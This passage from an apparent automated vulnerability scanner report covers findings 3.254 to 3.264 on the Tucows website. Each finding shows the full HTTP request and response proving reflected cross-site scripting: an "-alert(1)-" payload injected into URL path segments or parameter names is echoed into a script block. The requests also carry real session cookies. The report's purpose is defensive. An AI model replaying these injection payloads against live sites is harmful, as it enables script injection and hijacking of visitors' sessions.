Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css199e2"-alert(1)-"fac9720e4d9/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.254. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26131"-alert(1)-"79cf1522983 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css26131"-alert(1)-"79cf1522983 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css26131"-alert(1)-"79cf1522983";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.255. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be67"-alert(1)-"26a6c055dc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css?5be67"-alert(1)-"26a6c055dc5=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css?5be67"-alert(1)-"26a6c055dc5=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.256. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41642"-alert(1)-"3787a403d76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images41642"-alert(1)-"3787a403d76/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images41642"-alert(1)-"3787a403d76/newassets/includes/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.257. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7b02"-alert(1)-"7b6e920b807 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsf7b02"-alert(1)-"7b6e920b807/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsf7b02"-alert(1)-"7b6e920b807/includes/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.258. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56eb6"-alert(1)-"cf82ccc0327 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes56eb6"-alert(1)-"cf82ccc0327/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes56eb6"-alert(1)-"cf82ccc0327/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.259. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c99"-alert(1)-"55fa4663456 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js22c99"-alert(1)-"55fa4663456/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js22c99"-alert(1)-"55fa4663456/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.260. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c02"-alert(1)-"c3378b8f5df was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/aalib.js51c02"-alert(1)-"c3378b8f5df HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/aalib.js51c02"-alert(1)-"c3378b8f5df";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.261. http://www.tucows.com/images/newassets/includes/js/aalib.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85680"-alert(1)-"13364046c33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/aalib.js?85680"-alert(1)-"13364046c33=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/aalib.js?85680"-alert(1)-"13364046c33=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.262. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1638"-alert(1)-"93eb7715e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagese1638"-alert(1)-"93eb7715e1d/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagese1638"-alert(1)-"93eb7715e1d/newassets/includes/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.263. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94b97"-alert(1)-"7385601d3b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets94b97"-alert(1)-"7385601d3b4/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets94b97"-alert(1)-"7385601d3b4/includes/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.264. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5955"-alert(1)-"19d51f958d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesc5955"-alert(1)-"19d51f958d8/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
